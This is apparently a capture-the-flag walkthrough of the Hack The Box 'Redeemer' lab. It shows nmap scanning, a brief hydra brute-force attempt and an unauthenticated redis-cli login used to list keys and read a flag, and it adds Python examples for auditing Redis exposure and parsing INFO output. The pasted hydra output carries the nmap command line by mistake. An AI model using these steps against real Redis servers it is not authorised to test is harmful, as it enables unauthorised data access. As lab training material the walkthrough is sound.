HTB | Redeemer - Starting Point

https://app.hackthebox.com/machines/Redeemer/



Redeemer | Walkthrough

Phase
Reconnaissance
Foothold

Reconnaissance

Use nmap to enumerate the open ports on the target.

nmap -sV 10.129.152.68
nmap
nopedawn@npdn ~/L/H/S/Redeemer> nmap -sV 10.129.152.68
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-11 06:33 WIB
Nmap scan report for 10.129.152.68
Host is up (1.1s latency).
Not shown: 998 closed ports
PORT      STATE    SERVICE         VERSION
44442/tcp filtered coldfusion-auth
51493/tcp filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 523.68 seconds

There are no open TCP ports, so I tried this instead:

sudo nmap -p- --min-rate 5000 -sS -Pn -n -v 10.129.152.68
nmap scan all ports
nopedawn@npdn ~/L/H/S/Redeemer> sudo nmap -p- --min-rate 5000 -sS -Pn -n -v 10.129.152.68
[sudo] password for nopedawn:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-11 06:52 WIB
Initiating SYN Stealth Scan at 06:52
Scanning 10.129.152.68 [65535 ports]
Increasing send delay for 10.129.152.68 from 0 to 5 due to 2162 out of 7206 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 5 to 10 due to 6390 out of 21299 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 10 to 20 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.152.68 from 20 to 40 due to 4137 out of 13789 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 40 to 80 due to max_successful_tryno increase to 5
Increasing send delay for 10.129.152.68 from 80 to 160 due to 7303 out of 24341 dropped probes since last increase.
Discovered open port 6379/tcp on 10.129.152.68
Increasing send delay for 10.129.152.68 from 160 to 320 due to 11829 out of 39428 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 320 to 640 due to max_successful_tryno increase to 6
Increasing send delay for 10.129.152.68 from 640 to 1000 due to max_successful_tryno increase to 7
Completed SYN Stealth Scan at 06:52, 27.51s elapsed (65535 total ports)
Nmap scan report for 10.129.152.68
Host is up (0.30s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
6379/tcp open  redis

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.66 seconds
           Raw packets sent: 129485 (5.697MB) | Rcvd: 126660 (5.066MB)

A Redis service is open on port 6379/tcp.

I tried to enumerate using hydra, but it took a very long time

hydra enumerate redis
nopedawn@npdn ~/L/H/S/Redeemer> sudo nmap -p- --min-rate 5000 -sS -Pn -n -v 10.129.152.68
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 07:13:47
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task
[DATA] attacking rediss://10.129.152.68:6379/

Since this lab was in the easy category, I changed my mind and decided to log in without using credentials. And it passed. (lol)

redis-cli successfully logged in
nopedawn@npdn ~/L/H/S/Redeemer> redis-cli -h 10.129.152.68
10.129.152.68:6379>
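
The same check can be scripted when auditing Redis hosts you operate. This is an added example, not part of the original walkthrough: it sends a single PING in the Redis wire format (RESP) and classifies the first reply line. The function names and the sample replies are constructed for illustration.

```python
import socket

def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        data = arg.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(data), data))
    return b"".join(out)

def classify_reply(reply: bytes) -> str:
    """Map the first line of a reply to PING onto an exposure verdict."""
    line = reply.split(b"\r\n", 1)[0]
    if line == b"+PONG":
        return "open: commands accepted without AUTH"
    if line.startswith(b"-NOAUTH"):
        return "auth required"
    if line.startswith(b"-DENIED"):
        return "protected mode: remote clients refused"
    if line.startswith(b"-"):
        return "error: " + line[1:].decode(errors="replace")
    return "unknown: not a recognised Redis reply"

def check_host(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Connect, send PING, and classify whatever comes back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(encode_command("PING"))
            return classify_reply(sock.recv(1024))
    except OSError as exc:
        return f"unreachable: {exc}"

# Constructed sample replies (not captured from the lab host).
SAMPLES = {
    "no password set": b"+PONG\r\n",
    "requirepass set": b"-NOAUTH Authentication required.\r\n",
    "protected mode": b"-DENIED Redis is running in protected mode\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:16} -> {classify_reply(raw)}")
```

A host that answers `+PONG` to an unauthenticated PING is in the state this walkthrough relies on; setting `requirepass` (or ACL users) and limiting the listening address in redis.conf changes the verdict.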


Foothold

Use INFO to check the server and OS information.

INFO
nopedawn@npdn ~/L/H/S/Redeemer> redis-cli -h 10.129.152.68
10.129.152.68:6379> INFO
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:752
run_id:90a2c443a7a4a19cfc971436d381ec6dc314f668
tcp_port:6379
uptime_in_seconds:3010
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:9161524
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6541312
used_memory_rss_human:6.24M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:847166
used_memory_startup:797248
used_memory_dataset:12458
used_memory_dataset_perc:19.97%
allocator_allocated:1562232
allocator_active:1937408
allocator_resident:13385728
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.24
allocator_frag_bytes:375176
allocator_rss_ratio:6.91
allocator_rss_bytes:11448320
rss_overhead_ratio:0.49
rss_overhead_bytes:-6844416
mem_fragmentation_ratio:8.00
mem_fragmentation_bytes:5723696
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1770767095
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:421888
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:10
total_commands_processed:8
instantaneous_ops_per_sec:0
total_net_input_bytes:1370
total_net_output_bytes:29608
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:568
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:485696dbf489ae092e83cc959807878dacca140b
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:3.842992
used_cpu_user:3.449075
used_cpu_sys_children:0.002003
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
(0.51s)
10.129.152.68:6379>

This is Redis, an in-memory database, and the version is 5.0.7.
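
INFO output is long, and the fields that matter here (version, OS, config path, keyspace) are easy to miss by eye. The parser below is an added example, not part of the original walkthrough: it splits the output into its `# Section` blocks and decodes the Keyspace line. The sample text is abridged from the output above, and the function names are constructed for illustration.

```python
import re

# Abridged from the INFO output shown above (same values, fewer fields),
# including the redis-cli timing and prompt lines that must be ignored.
SAMPLE_INFO = """\
# Server
redis_version:5.0.7
os:Linux 5.4.0-77-generic x86_64
tcp_port:6379
config_file:/etc/redis/redis.conf

# Replication
role:master

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
(0.51s)
10.129.152.68:6379>
"""

def parse_info(text):
    """Return {section: {field: value}} from raw INFO output."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):
            current = sections.setdefault(line.lstrip("#").strip(), {})
            continue
        key, sep, value = line.partition(":")
        # Field names are word characters only; this skips blank lines,
        # "(0.51s)" timings and the "host:port>" prompt.
        if current is not None and sep and re.fullmatch(r"\w+", key):
            current[key] = value
    return sections

def parse_keyspace(keyspace):
    """Turn 'keys=4,expires=0,avg_ttl=0' into integer counters per database."""
    return {db: {k: int(v) for k, v in (item.split("=", 1) for item in stats.split(","))}
            for db, stats in keyspace.items()}

def summarize(text):
    info = parse_info(text)
    server = info.get("Server", {})
    dbs = parse_keyspace(info.get("Keyspace", {}))
    return {"version": server.get("redis_version"), "os": server.get("os"),
            "config_file": server.get("config_file"),
            "role": info.get("Replication", {}).get("role"),
            "databases": dbs,
            "total_keys": sum(d.get("keys", 0) for d in dbs.values())}

if __name__ == "__main__":
    print(summarize(SAMPLE_INFO))
```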

There are 4 keys in the database with index 0. To list all the keys, use the following commands:

redis-cli
$ redis-cli -h 10.129.152.68
10.129.152.68:6379> select
(error) ERR wrong number of arguments for 'select' command
(2.21s)
10.129.152.68:6379> select index
(error) ERR invalid DB index
(1.07s)
10.129.152.68:6379> KEYS *
1) "numb"
2) "flag"
3) "temp"
4) "stor"
(1.05s)
10.129.152.68:6379>

There is a flag key; just open it and read the value.

10.129.152.68:6379> KEYS *
1) "numb"
2) "flag"
3) "temp"
4) "stor"
(1.05s)
10.129.152.68:6379> KEYS pattern
(empty array)
(1.07s)
10.129.152.68:6379> KEYS "flag"
1) "flag"
(1.59s)
10.129.152.68:6379> KEYS *flag*
1) "flag"
(2.46s)
10.129.152.68:6379> type key
none
(1.17s)
10.129.152.68:6379> type flag
string
(1.15s)
10.129.152.68:6379> get key
(nil)
10.129.152.68:6379> get flag
"REDACTED"
(1.48s)
10.129.152.68:6379>